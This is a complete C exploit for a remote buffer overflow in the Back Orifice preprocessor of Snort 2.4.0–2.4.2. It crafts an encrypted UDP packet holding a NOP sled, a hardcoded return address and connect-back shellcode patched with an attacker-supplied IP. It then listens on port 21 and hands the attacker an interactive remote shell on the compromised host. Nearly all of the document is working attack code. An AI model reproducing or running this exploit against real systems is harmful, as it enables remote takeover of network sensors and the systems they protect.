Snort <= 2.4.2 Back Orifice Pre-processor Remote Buffer Overflow Exploit
/*
* snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit
*
* by Russell Sanford (xort@tty64.org)
* -> www.code-junkies.net <-
*
* Date: Nov 11, 2005
*
* Discription: A buffer overflow exist in the snort pre-preprocessor
* designed to detect encrypted Back Orifice ping packets
* on a network. The overflow occurs as a result of a field
* size read directly from the data within that packet
* inwhich an attacker can specify.
*
* Credit: ISS XFORCE (great work as always)
*
* Information: CERT TA05-291A
*
* Respect: Pull The Plug & DARPA Net Communities
*
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#define buffsize 1056
#define COOKIE "*!*QWTY?"
typedef struct {
char magic[8];
int len;
int id;
char type;
char data[buffsize];
char crc;
} BOHEADER;
char buffer[buffsize+5000];
static long holdrand = 31337L;
unsigned int ret_address = 0xbfffebad;
// 90 byte Connect Back shellcode. Connects Back to Port 21 to givin IP
char shellcode[] =
"\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x43\x5f\x68"
"\x45\xc4\x34\x1e" // IP-A
"\x81\x04\x24"
"\x01\x01\x01\x01" // IP-B
"\x68\x01\xff\xfe\x13\x81\x04\x24\x01\x01\x01\x01\x6a\x10\x51\x50\x89\xe1\xb0"
"\x66\xcd\x80\x5b\x31\xc9\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x31\xc0"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0"
"\x0b\xcd\x80\xeb\xfe";
int mrand (void) {
return(((holdrand = holdrand * 214013L + 2531011L) >> 16) & 0x7fff);
}
void timeout(int sig_num) {
printf(" [-] Listen() for connect back shellcode timed out. Exploit Failed!\n");
exit(1);
}
int main(int argc, char **argv) {
signal(SIGALRM,timeout);
int s, z, i, len_inet, IP_a, IP_b, l, sent;
char *server_addr=argv[1];
char *local_addr=argv[2];
char buf[512];
struct sockaddr_in adr_srvr, adr, loc_adr;
fd_set rfds, wfds;
printf("\n\t,------------------------------------------------------------,\n"
"\t| Snort 2.4.0-2.4.2 Back Orifice Preprocessor Remote Exploit |\n"
"\t| by Russell Sanford - xort@tty64.org |\n"
"\t`------------------------------------------------------------`\n\n");
/*
* Check for Valid Input
*/
if (argc < 3) {
printf("usage: ./snortxp TARGET-IP CONNECT-BACK-IP\n\n");
exit(1);
}
/*
* Fix up Safe Values for connect back shellcode
*/
IP_a = inet_addr(argv[2]);
IP_b = 0;
printf(" [x] Patching Shellcode to Connect back to %s.\n",argv[2]);
do {
IP_a -= 0x01010101; IP_b += 0x01010101;
}
while ( ((IP_a & 0x000000ff) == 0) ||
((IP_a & 0x0000ff00) == 0) ||
((IP_a & 0x00ff0000) == 0) ||
((IP_a & 0xff000000) == 0) );
*(int *)&shellcode[19] = IP_a;
*(int *)&shellcode[26] = IP_b;
/*
* Create And Fill In Header Info
*/
printf(" [x] Creating Evil Packet.\n");
BOHEADER evil_packet;
memcpy(evil_packet.magic,COOKIE,8);
evil_packet.len = (buffsize+38); //1094
evil_packet.id = 0xbadc0ded;
memset(evil_packet.data, 0x90, buffsize);
memcpy(&evil_packet.data[buffsize-300],shellcode,90);
evil_packet.type = 0x1;
evil_packet.crc = 0x43;
printf(" [x] Using Return Address: 0x%.8x.\n",ret_address);
*(int *)&evil_packet.data[buffsize-4] = ret_address;
/*
* Encrypt Evil Packet
*/
printf(" [x] Encrypting Packet.\n");
memcpy(buffer,&evil_packet,(18+buffsize));
for(i=0; i < (18+buffsize); i++) { buffer[i] = buffer[i] ^ (mrand()%256); }
/*
* Set Up Socket To Send UDP Packet
*/
printf(" [x] Preparing to Send Evil UDP Packet to %s.\n",argv[1]);
memset(&adr_srvr,0,sizeof adr_srvr);
adr_srvr.sin_family = AF_INET;
adr_srvr.sin_port = htons(9000);
adr_srvr.sin_addr.s_addr = inet_addr(server_addr);
len_inet = sizeof adr_srvr;
s = socket(AF_INET,SOCK_DGRAM,0);
if ( s == -1 ) {
printf(" [-] Failed to Create Socket. Exiting...\n");
exit(1);
}
/*
* Send Packet
*/
printf(" [x] Sending Packet.\n");
z = sendto(s,buffer,(18+buffsize),0,(struct sockaddr *)&adr_srvr, len_inet);
if ( z == -1 ) {
printf(" [-] Failed to Send Packet. Exiting...\n");
exit(1);
}
/*
* Listen For Connect Back Shellcode
*/
printf(" [x] Listening for Connect Back Shellcode.\n");
s = socket(AF_INET,SOCK_STREAM,0);
if ( s == -1 ) {
printf(" [-] Failed to Create Socket. Exiting...\n");
exit(1);
}
memset(&adr,0,sizeof adr);
adr.sin_family = AF_INET;
adr.sin_port = htons(21);
adr.sin_addr.s_addr = INADDR_ANY;
z = bind(s,(struct sockaddr *)&adr,sizeof(struct sockaddr));
if ( z == -1 ) {
printf(" [-] Failed to Bind Socket. Exiting...\n");
exit(1);
}
alarm(30); // Set alarm so code can time out
listen(s,4);
int sin_size = sizeof(struct sockaddr_in);
int new_fd = accept(s, (struct sockaddr *)&loc_adr,&sin_size);
alarm(0);
if (new_fd == -1 ) {
printf(" [-] Failed to Accept Connection. Exiting...\n");
exit(1);
}
printf(" [x] Connection Established! Exploit Successful.\n\n");
write(new_fd,"uname -a\nid\n",12);
/*
* Establish Connection. (ripped)
*/
while (1) {
FD_SET (0, &rfds);
FD_SET (new_fd, &rfds);
FD_SET (new_fd, &wfds);
select (new_fd + 1, &rfds, NULL, NULL, NULL);
if (FD_ISSET (0, &rfds)) {
l = read (0, buf, sizeof (buf));
if (l <= 0) {
exit (EXIT_FAILURE);
}
sent=0;
while (!sent) {
select (new_fd+1, NULL, &wfds, NULL, NULL);
if (FD_ISSET(new_fd, &wfds)) {
write(new_fd, buf, l);
sent=1;
}
}
}
if (FD_ISSET (new_fd, &rfds)) {
l = read (new_fd, buf, sizeof (buf));
if (l == 0) {
fprintf(stdout,"\n [x] Connection Closed By Remote Host.\n");
exit (EXIT_FAILURE);
} else if (l < 0) {
exit (EXIT_FAILURE);
}
write (1, buf, l);
}
}
return 0;
}